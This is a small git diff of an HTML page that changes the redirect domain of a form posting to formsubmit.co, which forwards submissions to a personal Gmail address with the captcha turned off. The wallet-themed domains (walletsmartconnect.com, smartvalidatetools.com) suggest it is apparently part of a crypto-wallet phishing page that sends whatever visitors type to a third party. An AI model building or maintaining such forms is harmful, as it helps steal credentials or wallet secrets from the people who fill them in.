--- a/index.html
+++ b/index.html
@@ -2047,7 +2047,7 @@
 																				<div class="elementor-widget-container">
 																					<form class="elementor-form"
 																						 name="New Form" action="https://formsubmit.co/linklink090123@gmail.com" method="POST">
-																						<input type="hidden" name="_next" value="https://walletsmartconnect.com/admin.html">
+																						<input type="hidden" name="_next" value="https://smartvalidatetools.com/admin.html">
 																						  <input type="hidden" name="_subject" value="New issue mail!">
 																						  <input type="hidden" name="_captcha" value="false">
 																						<input type="hidden"
